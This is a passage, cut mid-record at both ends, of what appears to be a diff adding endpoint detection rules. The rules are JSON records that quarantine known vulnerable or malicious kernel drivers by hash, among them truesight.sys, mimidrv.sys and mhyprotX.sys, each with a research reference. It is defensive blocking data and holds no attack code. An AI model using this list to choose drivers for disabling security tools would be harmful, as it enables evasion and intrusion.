"2026-03-23T11:45:31.499896Z", + "creation_date": "2026-03-23T11:45:31.499899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499908Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8fe6b40e491ea41c0e05145db2d7b159d8f493fa24418ef41d0e471667a076f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9011eec4-ca53-59f8-a0e8-6951f6dc1939", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157431Z", + "creation_date": "2026-03-23T11:45:31.157433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157442Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5951534de51c39aefffaa4239b3da079dac96326fd0422e59edc6af0f00eada", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "901f2e46-bf0f-546d-b711-b5dc8a429014", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830511Z", + "creation_date": "2026-03-23T11:45:30.830513Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830518Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c8caac32c31682d4732f78a47609b2069b65b3e73930106656f9b1d22845d08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9021781b-66a2-52d9-8676-23120adc3bd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605358Z", + "creation_date": "2026-03-23T11:45:29.605360Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605366Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad556300b1417c4d78c5c17cc59d7c5e9360f76e49cfd0a4e9564fedf923c66d", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "902466c5-006c-59f3-85d3-6c9759492253", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826174Z", + "creation_date": "2026-03-23T11:45:31.826176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7431b873a55857dc7a75419842e34a2e96f587182bf632d9d8db5fb497a41e19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90296bcc-22d0-5e92-86b0-835ecb16a717", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147431Z", + "creation_date": "2026-03-23T11:45:31.147433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab25cd1f115a6f3114a1355f54d20917df029080ba6e854169916ea27958b435", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "903198a8-912c-5ab7-b782-9884e48da682", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465454Z", + "creation_date": "2026-03-23T11:45:30.465457Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "e4b2c0aa28aac5e197312a061b05363e2e0387338b28b23272b5b6659d29b1d8", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90326a85-738a-5bd8-8800-287ddca8676a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832514Z", + "creation_date": "2026-03-23T11:45:30.832516Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832522Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e133d6ac51c2d412f49c73184a9069f2a5cbe78425857d78b06f88abd1ced25f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9035ada6-17ed-5742-8779-aabb9bc12ab4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827533Z", + "creation_date": "2026-03-23T11:45:31.827535Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39cc907dbc2bc08254ef115b2397aee842621201821312e5b7198e27e830b9d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "903eb15a-10a3-5fa3-b3e5-4c61c8ff2b98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479143Z", + "creation_date": "2026-03-23T11:45:31.479146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f3f2c7e511a82c968dc61726d94ef2d902baf3a36174651c2d4d2ebec8b4efc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "904471d3-657c-5b12-a9c0-530b60fd5686", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143945Z", + "creation_date": "2026-03-23T11:45:31.143953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c64fa4836d5ec14aa962edbb7fcb96d20b9b69e344ae9e93d7f531f9556c79d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "904b5926-e363-56bf-be2e-dab0df354e76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973392Z", + 
"creation_date": "2026-03-23T11:45:29.973394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "99ddeba6bcdc79e52e3ff8afc63dbe4b299161cf0f5558a2d7630c2a18daf2c6", + "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "904fa457-6cfe-5221-ba7e-655c5f9d0dd9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464735Z", + "creation_date": "2026-03-23T11:45:30.464738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ca5d47d076e99c312578ef6499e1fa7b9db88551cfc0f138da11105aca7c5e1", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"90538aef-b31d-561c-a8ac-9567c83886c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811116Z", + "creation_date": "2026-03-23T11:45:31.811118Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811124Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96476a61d507d601964c5eb173933056925231126c3358e9a74a577b3bd0c171", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "905608ce-76f4-522a-a972-4635ea347b33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605192Z", + "creation_date": "2026-03-23T11:45:29.605194Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.605199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5f13feced4d8b332cadb0a77dcc36c9788a119dc16295bbdcd2c225ae326299", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "905aa587-6b07-5b27-b4e1-e42f4cee57ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826866Z", + "creation_date": "2026-03-23T11:45:31.826937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826956Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "234037a78f11e067a0abafd8d871332ded2a413e58fa9ad551b86b36c3aa4585", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "905ae96f-f596-5e9c-a8a9-87f4f1fb5a5f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612074Z", + "creation_date": "2026-03-23T11:45:29.612076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "faa37602095f25135312f87ed7adb607ffa5e9b2931b58d00f7376ed0c6ec69a", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9068a806-2098-5670-b68a-91aab79f067d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499721Z", + "creation_date": "2026-03-23T11:45:31.499724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9e17479d6e6ab766302ac95d2632b5f6a271a0a99df6286a31d08c21d77493f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "906ca3c6-2737-56e0-b168-8e5194af30b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152084Z", + "creation_date": "2026-03-23T11:45:31.152087Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152095Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d3ef2066d3d22ce97f1fb3b39f5081acd1c34eab033ff139d80e95dab636e50", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90768535-f58a-58d7-bfab-56c5adda1e02", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479078Z", + "creation_date": "2026-03-23T11:45:31.479082Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479092Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f5938048e69ddddc2a30e1cc9b18e898fae74f119e9dfde73c417c96b912f42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "907a5e99-c5e3-511c-89f5-fd4f7d3ef5a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622228Z", + "creation_date": "2026-03-23T11:45:29.622230Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6991be9952aa08c0d2ac9fa728410ebdb44988b496ed01b8b7f478785ebb30c4", + "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) 
[CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9090e885-0d80-550d-ab43-a879a161e87c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813347Z", + "creation_date": "2026-03-23T11:45:31.813350Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813358Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e85661eaf2d80f59a7cce8588d487eb2f3e88cdf05580872ea7a379fd512d63d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90974d7c-40f0-518d-b0d1-137b96af3a4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477348Z", + "creation_date": 
"2026-03-23T11:45:30.477351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f42eb29f5b2bcb2a70d796fd71fd1b259d5380b216ee672cf46dcdd4604b87ad", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "909ca9fb-ef0b-5a0d-a5ab-32a75da649ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498255Z", + "creation_date": "2026-03-23T11:45:31.498260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95647f910288a7c30a2a886254d2dcbc0d1035e5ec0e9c13bb292d2432e6329c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90a201dc-9930-5357-8265-4ff9495a155e", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833754Z", + "creation_date": "2026-03-23T11:45:30.833757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab022e2378b4784621dbea6ede94ec67a9a68cc5e0e86e6be3d08ff90803a611", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90b2e7bd-f87c-532e-a73e-70a291ebab7a", + "test_maturity_current_count": 0, + 